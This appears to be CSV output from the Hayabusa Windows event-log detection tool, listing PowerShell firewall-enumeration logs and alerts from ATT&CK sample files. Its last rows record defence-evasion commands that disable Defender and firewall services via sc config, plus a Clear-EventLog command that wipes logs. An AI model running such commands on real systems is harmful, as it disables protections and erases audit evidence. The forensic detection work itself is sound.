+2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Profiles'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction]($this.PSBase.CimInstanceProperties['Direction'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Direction'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]($this.PSBase.CimInstanceProperties['Action'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Action'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal]($this.PSBase.CimInstanceProperties['EdgeTraversalPolicy'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['EdgeTraversalPolicy'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus]($this.PSBase.CimInstanceProperties['PrimaryStatus'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['PrimaryStatus'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$this.PSBase.CimInstanceProperties[""Status""].Value + "" ("" + ($this.PSBase.CimInstanceProperties[""StatusCode""].Value + 0) + "")""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[Microsoft.Windows.Firewall.Commands.Formatting.Formatter]::FormatEnforcementStatus($this.PSBase.CimInstanceProperties[""EnforcementStatus""].Value)",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType]($this.PSBase.CimInstanceProperties['PolicyStoreSourceType'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['PolicyStoreSourceType'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:12.926 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-NetFirewallRule): ""Get-NetFirewallRule"" ParameterBinding(Get-NetFirewallRule): name=""Name""; value="""" ParameterBinding(Get-NetFirewallRule): name=""DisplayName""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Description""; value="""" ParameterBinding(Get-NetFirewallRule): name=""DisplayGroup""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Group""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Enabled""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Direction""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Action""; value="""" ParameterBinding(Get-NetFirewallRule): name=""EdgeTraversalPolicy""; value="""" ParameterBinding(Get-NetFirewallRule): name=""LooseSourceMapping""; value="""" ParameterBinding(Get-NetFirewallRule): name=""LocalOnlyMapping""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Owner""; value="""" ParameterBinding(Get-NetFirewallRule): name=""PrimaryStatus""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Status""; value="""" ParameterBinding(Get-NetFirewallRule): name=""PolicyStoreSource""; value="""" ParameterBinding(Get-NetFirewallRule): name=""PolicyStoreSourceType""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallAddressFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallApplicationFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallInterfaceFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallInterfaceTypeFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallPortFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallSecurityFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallServiceFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallProfile""; value="""" ParameterBinding(Get-NetFirewallRule): name=""All""; value=""False"" ParameterBinding(Get-NetFirewallRule): name=""PolicyStore""; value="""" ParameterBinding(Get-NetFirewallRule): name=""GPOSession""; value="""" ParameterBinding(Get-NetFirewallRule): name=""TracePolicyStore""; value=""False"" ParameterBinding(Get-NetFirewallRule): name=""CimSession""; value="""" ParameterBinding(Get-NetFirewallRule): name=""ThrottleLimit""; value=""0"" ParameterBinding(Get-NetFirewallRule): name=""AsJob""; value=""False"" TerminatingError(): ""The pipeline has been stopped.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:12.926 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:13.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-NetFirewallSetting,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:13.786 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption]($this.PSBase.CimInstanceProperties['Exemptions'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Exemptions'].Value = [System.Uint32][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['EnableStatefulFtp'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['EnableStatefulFtp'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['EnableStatefulPptp'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['EnableStatefulPptp'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile]($this.PSBase.CimInstanceProperties['Profile'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Profile'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['RequireFullAuthSupport'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['RequireFullAuthSupport'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck]($this.PSBase.CimInstanceProperties['CertValidationLevel'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['CertValidationLevel'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT]($this.PSBase.CimInstanceProperties['AllowIPsecThroughNAT'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowIPsecThroughNAT'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$x = $this.PSBase.CimInstanceProperties[""MaxSAIdleTimeSeconds""]; if ($x -ne $null -and $x.Value -ne $null -and $x.Value.ToString().Equals(""0"")) { ""NotConfigured""; } else { $x.Value }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"param($x) if ($x.ToUpperInvariant().Equals(""NOTCONFIGURED"")) { $this.PSBase.CimInstanceProperties[""MaxSAIdleTimeSeconds""].Value = 0; } else { $this.PSBase.CimInstanceProperties[""MaxSAIdleTimeSeconds""].Value = [uint32]$x; }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding]($this.PSBase.CimInstanceProperties['KeyEncoding'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['KeyEncoding'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing]($this.PSBase.CimInstanceProperties['EnablePacketQueuing'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['EnablePacketQueuing'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:13.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-NetFirewallSetting): ""Get-NetFirewallSetting"" ParameterBinding(Get-NetFirewallSetting): name=""All""; value=""False"" ParameterBinding(Get-NetFirewallSetting): name=""PolicyStore""; value="""" ParameterBinding(Get-NetFirewallSetting): name=""GPOSession""; value="""" ParameterBinding(Get-NetFirewallSetting): name=""CimSession""; value="""" ParameterBinding(Get-NetFirewallSetting): name=""ThrottleLimit""; value=""0"" ParameterBinding(Get-NetFirewallSetting): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:13.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetSecuritySettingData (InstanceID = ""MSFT?GlobalIPSecSettingData"")""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:13.864 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:57:04.361 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc config sense start= disabled | Path: C:\Windows\System32\sc.exe | PID: 0xe58 | User: admmig | LID: 0x1844fa6,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender service deactivation attempt.evtx
+2021-10-25 16:57:05.977 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc config mpssvc start= disabled | Path: C:\Windows\System32\sc.exe | PID: 0x2ebc | User: admmig | LID: 0x1844fa6,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender service deactivation attempt.evtx
+2021-10-25 16:57:08.463 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc config WinDefend start= disabled | Path: C:\Windows\System32\sc.exe | PID: 0x2e40 | User: admmig | LID: 0x1844fa6,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender service deactivation attempt.evtx
+2021-10-26 03:04:24.089 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"Clear-EventLog -LogName application, system -confirm",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID800-4103-4104-Clear event log attempt.evtx
+2021-10-26 03:04:30.334 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:04:30.334 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Clear-EventLog): ""Clear-EventLog"" ParameterBinding(Clear-EventLog): name=""LogName""; value=""application, system"" ParameterBinding(Clear-EventLog): name=""Confirm""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID800-4103-4104-Clear event log attempt.evtx
+2021-10-26 03:04:30.334 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID800-4103-4104-Clear event log attempt.evtx
+2021-10-26 03:04:30.350 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID800-4103-4104-Clear event log attempt.evtx
+2021-10-26 03:09:51.875 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.002 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.080 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.095 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.127 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.142 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
